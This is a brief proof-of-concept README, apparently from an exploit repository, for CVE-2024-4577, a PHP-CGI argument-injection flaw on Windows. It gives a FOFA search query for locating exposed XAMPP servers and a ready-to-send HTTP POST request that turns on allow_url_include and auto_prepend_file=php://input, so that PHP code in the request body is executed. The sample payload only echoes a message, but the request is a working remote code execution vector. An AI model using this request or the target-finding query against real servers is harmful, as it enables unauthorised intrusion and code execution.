CVE-2024-4577 POC# CVE-2024-4577
# FOFA Search:
header="Xampps_info" || body="/xampps.jpg" || (header="location http" && header="xampp") || body="content=\"Kai Oswald Seidler" || title="XAMPP for" || title="XAMPP Version" || body="font-size: 1.2em; color: red;\">New XAMPP"
# POC:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host:
REDIRECT-STATUS: XCANWIN
<?php echo("vulnerability exists");?>
[4.0K] /data/pocs/ef0ea2e324de50ab705c9bf2c6f4d4717adaf3ef
└── [ 443] README.md
0 directories, 1 file